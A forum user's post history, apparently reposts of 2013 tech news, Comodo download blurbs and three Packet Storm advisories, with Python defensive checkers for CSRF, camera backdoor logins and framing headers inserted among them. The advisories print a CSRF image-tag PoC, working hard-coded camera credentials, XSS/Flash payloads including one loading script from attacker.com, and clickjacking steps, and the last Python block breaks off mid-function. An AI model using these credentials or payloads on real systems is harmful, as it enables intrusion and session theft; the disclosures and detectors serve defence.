Everything posted by Matt

  1. Cornered NSA whistleblower Edward Snowden has surfaced in Moscow's Sheremetevo International Airport - and he's seeking temporary asylum in Russia. Snowden, who blew the lid off the Americans' mass surveillance of the planet's internet, previously requested asylum in the country, but withdrew it after President Vladimir Putin said that would only be possible if the leaker stopped harming the US (he must "cease his work aimed at inflicting damage on our American partners", as the ex-KGB officer put it). But it was revealed during a press conference today that the whistleblower has again applied for political asylum in Moscow to avoid extradition to the States. Snowden sat before the media alongside representatives from WikiLeaks, Amnesty and Human Rights Watch in the airport where he has been in hiding for weeks. The American government, seeking to capture the ex-spook contractor, has been lobbying countries to turn away Snowden, and cancelled his passport shortly before he travelled between Hong Kong and Moscow on 23 May. The US authorities are also suspected of incorrectly warning European nations that Snowden was onboard the presidential jet of Bolivian premier Evo Morales as it flew over Austria from Russia last week. That rumour prompted officials to ground the aircraft in Vienna and search the plane for Snowden. Morales' private jet was en route from an energy conference in Moscow to his home in La Paz, Bolivia. In addition, the US has preemptively filed extradition requests to countries considering offering Snowden a bolt-hole. Nicaragua, Venezuela and Bolivia all said they would offer asylum to the NSA leaker in the wake of the Bolivian president's plane inspection, which ignited indignation among left-leaning Latin American governments. That still leaves the problem of how he might reach South American soil without passing through either US or a friendly nation's airspace.
Snowden and his team reckon the only way he can guarantee his safety for now, before attempting to obtain asylum in Latin American countries, is to gain temporary asylum in Russia. Snowden's physical security in his precarious position ultimately depends on keeping the Russians on-side, so the move makes sense, it would seem. Disappointingly, there was no word from the press conference on what Snowden made of smoking-hot though ineffective former Russian spy-turned-TV-presenter/model Anna Chapman's marriage proposal, which would presumably involve a more permanent stay in Russia. ® Source: TheRegister.co.uk
  2. Microsoft has filed a lawsuit which claims US Customs officials failed to block imports of Motorola Mobility phones after the agency's ear was bent by Google in a series of secret meetings. The lawsuit was filed on Friday, according to Bloomberg News, and accuses the US Customs and Border Protection (CBP) Agency of failing to enforce an International Trade Commission ban on the import of Motorola Mobility devices which violate some of Microsoft's patents. Microsoft claims that the CBP held secret meetings with Motorola Mobility's owner Google in April which caused the agency to decide in June to continue to let Motorola Mobility phones into the country, going against the ITC's May 2012 decision. "Customs has a clear responsibility to carry out ITC decisions, which are reached after a full trial and rigorous legal review," Microsoft's Deputy General Counsel David Howard is reported to have said in a statement. "Here Customs repeatedly ignored its obligation and did so based on secret discussions." The International Trade Commission order is in effect until April 2018, when Microsoft's patents expire. As is typical of these types of cases, the Microsoft patents in question are as broad as Steve Ballmer's ambition is large, ranging from one for "Generating meeting requests and group scheduling from a mobile device" which was filed in 1998, to one for a "Context sensitive menu system/menu behavior" which was filed in 1996, to the more recent "Method and system for managing changes to a contact database" filed in 2002. In a statement emailed to The Register Google said "US Customs appropriately rejected Microsoft's effort to broaden its patent claims to block Americans from using a wide range of legitimate calendar functions, like scheduling meetings, on their mobile phones. We're confident that the court will agree." Microsoft hopes to compel the CBP agency to enforce the import ban via a court order to make sure it enforces the ban.
"The only conclusion that can reasonably be drawn from CBP’s pattern of conduct is that CBP will not enforce the commission's exclusion order absent a court order compelling it to do so," Microsoft is reported to have said in the filing. "CBP has repeatedly allowed Motorola to evade that order based on secret presentations that CBP has refused to share with Microsoft." Apple is also embroiled in a patent dispute that could see an ITC embargo come in against imports of its older iPhone 4 and iPad models, after Samsung convinced the trade body that they infringed on one of its patents. At the time of writing Microsoft had not responded to requests for further information by The Register. The irony of all this is that Google acquired Motorola to give it a strategic warchest of patents to protect it from just this sort of court case. ® Source: TheRegister.co.uk
  3. Video-streaming site Hulu has opted to walk away from talks about a possible buyout, ending months of speculation as to which media or online giant might snap it up. In a joint statement issued on Friday, co-owners 21st Century Fox, NBCUniversal, and The Walt Disney Company said they won't entertain any further offers for Hulu and will instead maintain their current ownership positions. They will also jointly plunk down another $750m to recapitalize the company, which pulled in $690m in revenue last year. That cash infusion is in the ballpark of what Yahoo! was reportedly offering to buy up Hulu in May. Other potential suitors were said to include AT&T, DirecTV, Time Warner Cable, the talent agency William Morris Endeavor, and some private equity firms. But despite lots of offers, it seems none offered terms that Hulu's co-owners could agree on. "We had meaningful conversations with a number of potential partners and buyers, each with impressive plans and offers to match," 21st Century Fox president and COO Chase Carey said in Friday's joint statement, "but with 21st Century Fox and Disney fully aligned in our collective vision and goals for the business, we decided to continue to empower the Hulu team, in this fashion, to continue the incredible momentum they've built over the last few years." That momentum has made Hulu one of the leading online video sites, with 30 million monthly unique visitors and 4 million paid subscribers. The service now claims to host premium online TV programming from over 400 content partners. This isn't the first time Hulu's co-owners have dangled the company in front of potential buyers only to pull it back, though. They last put it up for sale in 2011, with an asking price of $2bn. But although they got several bids in that range – and Google reportedly offered as much as $4bn – they couldn't reach agreement on any of them. The bids this time were a lot lower. 
Private equity firm The Chernin Group reportedly bid just $500m – less than Hulu's 2012 revenue. But it's not hard to see why, given how the market for video content is shaping up. In June, Hudson Square analyst Dan Ernst told Forbes that to remain competitive, any Hulu buyer would need to invest in new content to the tune of $2bn per year. "To compete with Netflix and cable, it's a money loser," he said. ® Source: TheRegister.co.uk
  4. Unfortunately, most firewalls leak. But Comodo's Firewall is unique in that it passes all known leak tests to ensure the integrity of data entering and exiting your system. Comodo has put our firewall through all kinds of sophisticated tests to ensure our firewall is powerful enough to ward off these attacks with default settings. No other firewall has had to work this hard. Take this test yourself. Comodo Firewall secures your system against internal attacks such as Trojans, viruses, malicious software and external attacks by hackers. Safeguard your personal data through a simple user friendly single-click interface offering full immunity to attack. Comodo Personal Firewall helps you connect in a secure way to the internet and global networks. This is the final and first release of Comodo Firewall and contains support for Windows Vista, a new interface and a whole host of improved security features, including host intrusion protection, network-based firewall and an application analysis engine. Note that Comodo Firewall is completely free, even for commercial use. Download : Link
  5. Buy a new PC and you’ll often find it ships pre-installed with an anti-virus client. Sometimes you receive more than basic anti-virus support, but the first thing you need to do is go out and find more extensive security software to make sure your new machine is protected against every possible threat. For this reason, various security developers have resorted to giving away more extensive free software. By combining anti-virus, anti-spyware and a firewall, Comodo have bundled a few of their free applications and published these as an ‘Internet Security’ bundle. Comodo Internet Security is a free suite of security tools designed to protect you against the majority of threats you may encounter when you surf the Internet. This basic Internet Security suite gives you widespread protection, but Comodo also publish a Professional version with additional features such as remote access for removing threats that have infected your PC and have stopped you being able to boot into your PC. Download : Link
  6. Developed by one of the world’s leading IT security providers, Comodo AntiVirus 2 beta leverages multiple technologies (including on demand & on access scanning, email scanning, process monitoring and worm blocking) to immediately start cleaning or quarantining suspicious files from your hard drives, shared disks, emails, downloads and system memory. Updated virus definitions are automatically downloaded according to a schedule of your choice or by a single click on the 'updater' button. Once installed, Comodo AntiVirus 2 will unobtrusively sit in your system tray, silently and efficiently defending your system from the latest virus outbreaks. It's easy to install and configure, will not slow down your PC by hogging system resources and is free for life to the end user. This free anti-virus client also contains free definition updates for life. There are no catches. Download : Link
  7. Sony has given up its appeal over a fine of £250,000 from the Information Commissioner’s Office (ICO) having originally vowed to fight the case. The firm claimed it has done so in order to avoid revealing information on its security procedures rather than because it now agrees with the fine. The ICO handed the fine to the firm at the start of the year after a hack in 2011 on its PlayStation Network left millions of customers' details exposed, including their addresses, email addresses, dates of birth and account passwords. The ICO said customers' payment card details were also at risk. The ICO's deputy commissioner David Smith said Sony, as a leading technology company, should have been better prepared. "It is a company that trades on its technical expertise, and there's no doubt in my mind that they had access to both the technical knowledge and the resources to keep this information safe," he said when announcing the fine. However, Sony said at the time it would appeal as the breach that exposed the data was the result of a "focused and determined criminal attack". But, writing on Twitter, the ICO said Sony had now dropped its case on the appeal. Source: V3.co.uk
  8. Description : PrestaShop version 1.5.4 suffers from a cross site request forgery vulnerability
Author : Eyup CELIK, EntPro Cyber Security Research Group
Source : PrestaShop 1.5.4 Cross Site Request Forgery ≈ Packet Storm
Code :

View online: http://demo-store.prestashop.com/en/

* Advisory ID: PRESTASHOP
* Version: 1.5.4
* Date: 2013-July-11
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

-------- DESCRIPTION ---------------------------------------------------------
With this vulnerability, account passwords and mail addresses could be modified and also products could be added or removed remotely from the shopping cart.

-------- SOLUTION ------------------------------------------------------------
There is no solution for this vulnerability at the moment.

-------- REPORTED BY ---------------------------------------------------------
* EntPro Cyber Security Research Group (www.entpro.com.tr)
  (Eyüp ÇELİK, İsmail SAYGILI, Gökay BEKŞEN, Ünlü AĞYOL, Yunus Emre KARABULUT)

-------- EXPLOIT CODE ---------------------------------------------------------
<html>
<head>
</head>
<body>
<img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</html>
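One way a shop could defend a cart endpoint against the kind of image-tag request shown in this advisory, as an added example that is not PrestaShop code and not from the advisory authors: state changes are accepted only over POST, only from the shop's own origin, and only with a per-session synchronizer token. The shop origin, the server secret and the three request dictionaries are constructed stand-ins for a real framework's request object.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed secret for this example; a real deployment keeps it server-side only.
SERVER_SECRET = b"example-only-server-secret"
SHOP_ORIGIN = "https://shop.example"  # hypothetical shop origin


def issue_csrf_token(session_id: str) -> str:
    """Derive a per-session synchronizer token (HMAC over the session id)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _request_origin(headers: dict) -> str:
    """Return scheme://host of the Origin header, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlparse(value)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def check_cart_change(request: dict, session_id: str) -> tuple:
    """Decide whether a state-changing cart request may proceed.

    `request` is a plain dict with "method", "headers" and "params" keys
    (a stand-in for the framework's request object).  Returns
    (allowed, reason) so callers can log why a request was refused.
    """
    # 1. Side effects only via POST: an <img src=...> can only issue a GET.
    if request["method"].upper() != "POST":
        return False, "state change attempted via " + request["method"]

    # 2. Origin/Referer must be the shop itself; a page on another site
    #    that auto-submits a form fails here even before the token check.
    origin = _request_origin(request["headers"])
    if origin != SHOP_ORIGIN:
        return False, "cross-site origin: " + (origin or "<none>")

    # 3. The form must carry the session's synchronizer token; compare in
    #    constant time so the check itself does not leak the token.
    supplied = request["params"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, issue_csrf_token(session_id)):
        return False, "missing or invalid csrf_token"

    return True, "ok"


# Constructed sample requests.  The first mirrors the advisory's <img> PoC:
# the victim's browser fetches the cart URL with a GET and no token.
SESSION = "sess-1234"

IMG_TAG_REQUEST = {
    "method": "GET",
    "headers": {"Referer": "http://attacker.example/page.html"},
    "params": {"add": "", "id_product": "42"},
}

FORGED_POST_REQUEST = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example"},
    "params": {"add": "", "id_product": "42"},
}

LEGIT_REQUEST = {
    "method": "POST",
    "headers": {"Origin": SHOP_ORIGIN},
    "params": {"add": "", "id_product": "42",
               "csrf_token": issue_csrf_token(SESSION)},
}

if __name__ == "__main__":
    for name, req in [("img tag", IMG_TAG_REQUEST),
                      ("forged POST", FORGED_POST_REQUEST),
                      ("legitimate", LEGIT_REQUEST)]:
        print(name, check_cart_change(req, SESSION))
```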
  9. Description : Multiple cameras suffer from having hardcoded backdoor accounts allowing for authentication bypass and code execution. Included are various 3S Vision, Asante Voyager, and ALinking cameras.
Author : Roberto Paleari
Source : 3S Vision / Asante Voyager / ALinking Hardcoded Accounts ≈ Packet Storm
Code :

Hard-coded accounts on multiple network cameras
===============================================

[ADVISORY INFORMATION]
Title: Hard-coded accounts on multiple network cameras
Discovery date: 05/06/2013
Release date: 11/07/2013
Advisory URL: http://goo.gl/82Rlb
Credits: Roberto Paleari (roberto.paleari@emaze.net, @rpaleari)
         Alessandro Di Pinto (alessandro.dipinto@emaze.net, @adipinto)

[VULNERABILITY INFORMATION]
Class: Authentication bypass, command execution

[AFFECTED PRODUCTS]
We confirm the presence of the security vulnerability on the following products/firmware versions:
* 3S Vision N1072 network camera, firmware version v1.07_STD-1
* 3S Vision N1073 network camera, firmware version v1.02_STD-1
* 3S Vision N3071 network camera, firmware version v1.05_STD-1
* Asante Voyager 1 network camera, firmware version v2.08
* Asante Voyager 2 network camera, firmware version v2.08
* ALinking ALC-9451/ALC-9452 network cameras, firmware version v1.33
Several other device manufacturers, models and firmware versions are probably also vulnerable, but they were not checked, mainly due to time constraints.

[VULNERABILITY DETAILS]
The web server and RTSP daemon of the affected cameras include a hard-coded user account. Different device manufacturers (and camera models) use different hard-coded accounts. This issue can be abused by remote attackers to gain administrative access to the affected devices. In the following, we report the hard-coded accounts for 3S Vision and Asante network cameras, as these are the only device manufacturers that were contacted and replied to our inquiries.

- 3S Vision cameras
  * HTTP & RTSP account: "3sadmin:27988303"
- Asante Voyager 1 network cameras
  * HTTP account: "uniform:uic7799"
  * RTSP account: "uicrd:xu06m3"
- Asante Voyager 2 network cameras
  * HTTP & RTSP account: "uicrd:xu06m3"

As the account is hard-coded in the web server and RTSP server binary files, it cannot be changed by end-users without upgrading the whole firmware image (or manually patching the executable files).

[REMEDIATION]
Asante provided Emaze with a patched firmware image that disables the hard-coded account. At the time of writing, this software version is still not available through the company's web site, but will probably be released very soon. To the best of our knowledge, other device manufacturers have not addressed the issues described in this advisory, thus no updated firmware versions are available for their products.

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.
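A defender's check for the accounts listed in this advisory, added here and not part of the Emaze advisory: it scans captured HTTP and RTSP request lines for Basic credentials whose user name is one of the hard-coded accounts, so that use of a backdoor login against a camera on the network shows up in monitoring. The one-line sensor format and the sample capture are constructed for this example; only the user names come from the advisory.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# User names of the hard-coded accounts listed in the advisory above.
BACKDOOR_USERS = {"3sadmin", "uniform", "uicrd"}

# Matches an HTTP or RTSP Basic credential on a captured request line.
BASIC_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Constructed sensor line format:
#   "<timestamp> <client> -> <camera> <HTTP|RTSP> <request line and headers>"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+)\s+(HTTP|RTSP)\s+(.*)$")


def basic_auth_user(b64_blob: str) -> Optional[str]:
    """Decode a Basic credential and return its user name (never the password)."""
    try:
        decoded = base64.b64decode(b64_blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # malformed or truncated credential: ignore, do not crash
    user, sep, _password = decoded.partition(":")
    return user if sep else None


def find_backdoor_logins(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, camera, user) for every captured request
    that authenticates with one of the advisory's hard-coded user names."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the sensor format
        ts, client, camera, _proto, rest = m.groups()
        auth = BASIC_RE.search(rest)
        if not auth:
            continue  # unauthenticated request
        user = basic_auth_user(auth.group(1))
        if user in BACKDOOR_USERS:
            hits.append((ts, client, camera, user))
    return hits


def _basic(user: str, password: str) -> str:
    """Helper used only to build the constructed sample capture below."""
    return base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample capture (not real traffic).  Lines 2 and 4 use the fixed
# accounts from the advisory; the others are ordinary or malformed requests.
SAMPLE_LINES = [
    "2013-07-11T08:00:01Z 10.0.0.5 -> 10.0.0.20 HTTP GET /view.cgi Authorization: Basic " + _basic("admin", "correct-horse"),
    "2013-07-11T08:00:07Z 198.51.100.9 -> 10.0.0.20 HTTP GET /config.cgi Authorization: Basic " + _basic("3sadmin", "27988303"),
    "2013-07-11T08:00:09Z 10.0.0.7 -> 10.0.0.21 RTSP DESCRIBE rtsp://10.0.0.21/live Authorization: Basic not*base64*",
    "2013-07-11T08:00:12Z 198.51.100.9 -> 10.0.0.21 RTSP DESCRIBE rtsp://10.0.0.21/live Authorization: Basic " + _basic("uicrd", "xu06m3"),
    "garbage line that does not match the sensor format",
]

if __name__ == "__main__":
    for hit in find_backdoor_logins(SAMPLE_LINES):
        print("hard-coded account used:", hit)
```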
  10. Description : Atlassian Confluence versions 4.3.5 and below suffer from cross site scripting, cross site flashing, and insufficient framing protection vulnerabilities Author : Andrew Horton (urbanadventurer), Sow Ching Shiong, Mahendra Source : Atlassian Confluence 4.3.5 XSS / Clickjacking ? Packet Storm Code : =============================================================================== BAE Systems Detica Security Advisory: DS-2013-005 =============================================================================== Title: Atlassian Confluence Multiple Issues Version: 4.3.5, and earlier Issue type: Persistent Cross-site Scripting, Persistent Cross-site Flashing, Click Jacking Affected vendor: Atlassian (www.atlassian.com) Release date: 10/07/2013 Discovered by: Andrew Horton, Sow Ching Shiong, Mahendra Issue status: Patch available (unconfirmed) =============================================================================== Summary ------- Security researchers Andrew Horton, Sow Ching Shiong and Mahendra discovered persistent cross-site scripting, persistent cross-site flashing, and insufficient framing protection, vulnerabilities in Confluence version 4.3.5. The latest fully patched version of the application was used at the time of discovery. The persistent cross-site scripting, and cross-site flashing vulnerabilities, enable an attacker with a user account on the Atlassian Confluence web application, to specially craft a Confluence webpage that will hijack the session of users who visit that page. This can be used by an attacker to elevate privileges from a basic user account, to an administrative account after any administrative user visits the webpage. The insufficient framing protection vulnerability enables an attacker without a user account, to lure an authenticated user into following an untrusted link, click on a webpage, and perform unwanted actions. A harmless example is to update a user’s profile with new information. 
* Persistent Cross-site Scripting The vulnerability is caused by insufficient controls in the application to prevent JavaScript content executing that is included in user uploaded files. When a user uploads a file as an attachment to a wiki page, the web application chooses whether to allow the file to be rendered in-line based on the filename extension and the provided content-type. It is possible to bypass these controls and upload a file containing JavaScript content that will execute JavaScript in a user’s web browser. * Persistent Cross-site Flashing The vulnerability exists because the application has a design flaw that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting. * Insufficient Framing Protection Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing. Persistent Cross-site Scripting Description ============================================ Cross-site scripting vulnerabilities exist when an attacker can cause arbitrary JavaScript into be included within a response from a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time. Throughout most of the Atlassian Confluence web application, there is adequate user input validation and output sanitization to protect against cross-site scripting however the attachment upload functionality can be abused to perform this attack. 
When a user uploads a file as an attachment to a wiki page, the web application chooses whether to render the content in-line or provide it as a downloadable file depending on the filename extension and the user provided content-type. HTML files are restricted from being rendered in-line. However, it is possible to bypass these controls and upload a file containing JavaScript content that will be rendered as HTML in the web browser. This can be achieved by uploading a filename that does not contain an “HTML” extension, and providing a user supplied content-type that is set to something other than “text/html”. Impact ------ This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript. Affected products ------------------ This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept ------------------ To demonstrate the persistent cross-site scripting, follow the steps below. 1. Create a file that contains a cross-site scripting payload such as the following example: <html><body><script>alert(1);</script></body></html> 2. Add an attachment to a wiki page. 3. Use your proxy software to intercept the POST request that uploads the attachment file. Alter the user supplied content-type to a value other than “text/html” and ensure that the filename does not contain the suffix, “.html” as shown below. 4. Observe that the attached file has been uploaded. 5. Follow the attached file link and observe that cross-site scripting occurs. Solution --------- * Solution for Atlassian Use a whitelist of allowed content types that can be rendered in-line instead of a blacklist approach which restricts files based on filenames and user provided content-types. Ensure that none of the whitelisted content-types can be used to render HTML which may include scripting content. 
For unknown and non-whitelisted content types, force the browser to download the file by including the “Content-Disposition: attachment;” HTTP header. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Persistent Cross-site Flashing Description ========================================== Cross-site flashing vulnerabilities exist when an attacker can cause arbitrary JavaScript into be executed from within a Flash file in a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time. The vulnerability is due to a design flaw in the application that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting. This vulnerability is more easily exploited than the persistent cross-site scripting vulnerability as the JavaScript can be automatically executed upon viewing a webpage on the wiki. A variety of methods are available within the ActionScript language to execute JavaScript from within a Flash file. These methods include, but are not limited to the following examples: * ExternalInterface.call("document.write","<script>alert(1)</script>"); * navigateToURL(new URLRequest("Javascript: document.write(\"<script>alert(1)</scr\"+\"ipt>\")"),"_self") * ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://attacker.com/evil.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); Impact ------ This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript. 
Affected products ------------------ This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept ---------------- To demonstrate the stored cross-site flashing, which is similar in impact to cross-site scripting, follow the steps below. 1. Create a new page in the wiki. 2. Add an attachment, upload an SWF file which triggers JavaScript. A ability to upload an SWF file to the web server is considered insecure in isolation. 3. Insert a media macro object to the wiki page. 4. Select the attachment you just uploaded as the media file ti insert into the page. 5. Verify that the Flash object is embedded within the page. 6. Save the page and verify that the stored cross-site flashing occurs when the page is viewed. In this case, the SWF cause an alert box to popup to demonstrate the ability to execute arbitrary JavaScript. Solution -------- * Solution for Atlassian To prevent user supplied Flash files from interacting with the web application, allow the files to be only accessible via a URL that cannot interact with the web application due to “same origin policies” enforced by the user’s web browser. Require a separate hostname for hosting user supplied content such as SWF files, for example: if the Confluence web application was accessible at https://www.confluence.local, then access media such as Flash files from https://media.confluence.local. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Insufficient Framing Prevention =============================== Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing. 
To perform a click jacking attack, an attacker must lure an authenticated user into following an untrusted link, then entice the user into clicking on the web page. The attacker will set up a web page that contains the Confluence web application within an iframe that is made invisible. The user will unwittingly click on a button or link within Confluence causing an unwanted action. The iframe is made invisible by setting the CSS opacity property, it is placed on top of other elements by using the CSS z-index property, and it is lined up with a visible decoy button by using CSS absolute positioning. Frame sniffing attacks require that a user be lured into following an untrusted link. The attack requires placing Confluence within an iframe, then attempting to scroll the iframe to various anchor names. The parent web page can determine whether the scrolling is successful which leaks details about the iframe’s content. Impact ------ Click jacking can be used to perform a limited set of unwanted actions on a user’s behalf. One example of an attack is to update a user’s profile with new information for fields such as ‘About Me’, and to update the user’s website link. This is made possible by the ability to populate form fields by setting URL parameters. Frame sniffing can be used to elicit information from the Confluence web application, for example it can be used to determine which of a set of company names are searchable using the Confluence search functionality. Affected products ----------------- This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected. Proof of concept for Frame Sniffing ------------------------------------ Note that some web browsers provide protection against frame sniffing. Testing was performed using the latest Firefox. To exploit this issue follow these steps: 1. Lure an authenticated user to a webpage that contains a BeEF (Browser Exploitation Framework) hook. 2. 
Use the iFrame Sniffer module. a. Set the input URL to : https://host.local/dosearchsite.action?queryString=apple b. Set the anchors to check to : search-results-body 3. Click Execute 4. Check the response. If the anchor, #search-results-body exists then the search term ‘apple’ can be found within the Confluence web application. A secondary exploit to determine whether a user is logged in: 1. Lure a user to a webpage that contains a BeEF (Browser Exploitation Framework) hook. 2. Use the iFrame Sniffer module. a. Set the input URL to : https://host.local/login.action b. Set the anchors to check to : forgot-password 3. Click Execute 4. Check the response. If the anchor, #forgot-password exists then the user is not currently logged into the Confluence web application. Proof of concept for Click Jacking ----------------------------------- To exploit this issue follow these steps: 1. Create a web page that contains the following URL in an iframe, a. https://host.local/users/editmyprofile.action?personalInformation=I%20got%20clickjacked&userparam-website=http://phishing.com/ 2. Set the CSS properties for the iframe to: a. z-index:10; opacity:0; 3. Place an image on the web page underneath the ‘Save’ button 4. Lure an authenticated Confluence user into following an untrusted link and clicking Solution -------- * Solution for Atlassian To prevent framing attacks, include the X-Frame-Options HTTP header for all web application web pages. The values for X-Frame-Options are: * DENY – The page cannot be displayed in a frame * SAMEORIGIN – The page can only be displayed in a frame on the same origin as the page itself. * ALLOW-FROM <URI> – The page can only be displayed in a frame on the specified origin Detica recommends using the DENY option. * Solution for Confluence users Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved. Response timeline ------------------ * 04/02/2013 - Vendor notified. 
* 04/02/2013 - Vendor acknowledges receipt of advisory. * 04/02/2013 - Vendor confirms issue presence and claims they were already aware of some of these issues at https://jira.atlassian.com/browse/CONF-27973. * 21/05/2013 – Vendor advises that these security issues are resolved on their bug tracking JIRA system at https://jira.atlassian.com/browse/CONF-27973. * 10/07/2013 – Detica has not verified the veracity of the vendor resolution. * 10/07/2013 - This advisory is published. References ---------- * Vendor advisory: The vendor, Atlassian has chosen not to issue an advisory. =============================================================================== Vulnerability Disclosure Policy ------------------------------- Detica works extensively with a wide range of software and hardware product vendors internationally to assess and improve the security of the systems they have developed. Our primary interest is ensuring the security of our clients, as well as the broader community of users. To support this purpose, we follow a responsible disclosure policy, consisting broadly of the following approach: Detica will make all reasonable effort to formally contact the vendor and/or manufacturer (via email, telephone and/or facsimile) of the vulnerability, providing as much information as is reasonably possible to enable the vendor to reproduce and fix the identified issues. Detica requests a response from the vendor to this initial communication, acknowledging receipt of the vulnerability report, within one (1) week. If no response has been received, Detica will make a second attempt after one (1) week to contact the vendor, again requesting receipt of the report within one (1) week. Detica will generally allow three (3) months for a patch to be released which satisfactorily remediates the vulnerability, prior to disclosure. The three (3) month period will begin upon the first attempt by Detica to contact the vendor. 
If either time frame elapses without sufficient explanation, Detica may issue a public advisory about the elevated level of risk posed by running the vendor’s product. Detica reserves the exclusive right to publicly release details provided to the vendor before a patch or effective mitigation has been released.

Detica similarly reserves the right to communicate details of the vulnerabilities to our clients and partners, under non-disclosure agreement, to enable them to take any available protective measures prior to the vendor’s patch being released.

When a patch or other acknowledgement of this issue is released by the vendor, we request attribution of the research contained in this report to Detica (http://www.baesystemsdetica.com.au). Detica research can be contacted at research@baesystemsdetica.com.au.

About BAE Systems Detica
-------------------------
At Detica, we specialise in providing information security consulting and testing services for government and commercial clients. Established in 2004, we’re now one of the leading independent information security companies in the Australasian and SE-Asian region. We employ in excess of 40 permanent and contract staff in offices throughout Australia and in Singapore and Malaysia. All of our people are experienced security professionals, and each is a leading specialist in their field.

We have the experience, the industry knowledge and expertise to deliver effective, measurable outcomes for business and government clients. Our direct and pragmatic Australian approach to what is generally a complex business area has been a major advantage. This approach has enabled Detica to engage and win contracts with Australian and State Government agencies and major international software companies and governments, despite competition from large multinational players.

We have genuine expertise in delivering consulting and testing services to major clients in the Defence & National Security, Financial Services, Government, Health & Human Services, ICT and Critical National Infrastructure industries.

Understanding the importance of information security in the business and wider community, we are a sponsor of the Australian Information Industry Association (AIIA); Internet Industry Association (IIA) SME security portal; and provide pro-bono consulting services and financial support to The Inspire Foundation and Reachout! - a service that uses the Internet to provide much-needed information, assistance and referrals to young people going through tough times.

For more information contact us or visit our website http://www.baesystemsdetica.com.au/ or email us at info@baesystemsdetica.com

===============================================================================
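The advisory's fix is the X-Frame-Options header. As an added defender-side check (not part of the Detica advisory), the Python below parses a raw HTTP response head and classifies its framing protection by the three header values listed above; the sample responses are constructed, not captured from a real Confluence server.

```python
"""Classify the X-Frame-Options protection of an HTTP response.

Added defender-side check, not part of the Detica advisory above. The sample
responses are constructed; nothing is fetched from a live server."""

from typing import Dict, List, Tuple

# Verdicts, strongest first.
DENY = "deny"              # never framed: the option Detica recommends
SAMEORIGIN = "sameorigin"  # framed only by pages of the same origin
ALLOW_FROM = "allow-from"  # framed only by one named origin (legacy value, browser support varies)
INVALID = "invalid"        # header present but unusable: unknown or conflicting values
MISSING = "missing"        # no header: any site may frame the page (clickjacking / iframe sniffing)


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP response head into (name, value) pairs.

    Header names are case-insensitive, so they are lower-cased here. The
    status line and everything after the first blank line are ignored.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs: List[Tuple[str, str]] = []
    for line in head.split("\n")[1:]:  # [0] is the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def assess_frame_protection(raw_response: str) -> Dict[str, object]:
    """Return {'verdict', 'values', 'allowed_origin'} for one response.

    Repeated header lines and comma-separated lists are collected; duplicates
    of one value are fine, but two different values mean the configuration is
    wrong and the result is INVALID rather than a guess at browser behaviour.
    """
    values: List[str] = []
    for name, value in parse_headers(raw_response):
        if name == "x-frame-options":
            values.extend(v.strip() for v in value.split(",") if v.strip())

    result: Dict[str, object] = {"verdict": MISSING, "values": values, "allowed_origin": None}
    if not values:
        return result

    distinct: Dict[str, str] = {}      # upper-cased value -> value as written
    for v in values:
        distinct.setdefault(v.upper(), v)
    if len(distinct) > 1:
        result["verdict"] = INVALID
        return result

    upper, as_written = next(iter(distinct.items()))
    if upper == "DENY":
        result["verdict"] = DENY
    elif upper == "SAMEORIGIN":
        result["verdict"] = SAMEORIGIN
    elif upper.startswith("ALLOW-FROM ") and len(as_written.split()) == 2:
        result["verdict"] = ALLOW_FROM
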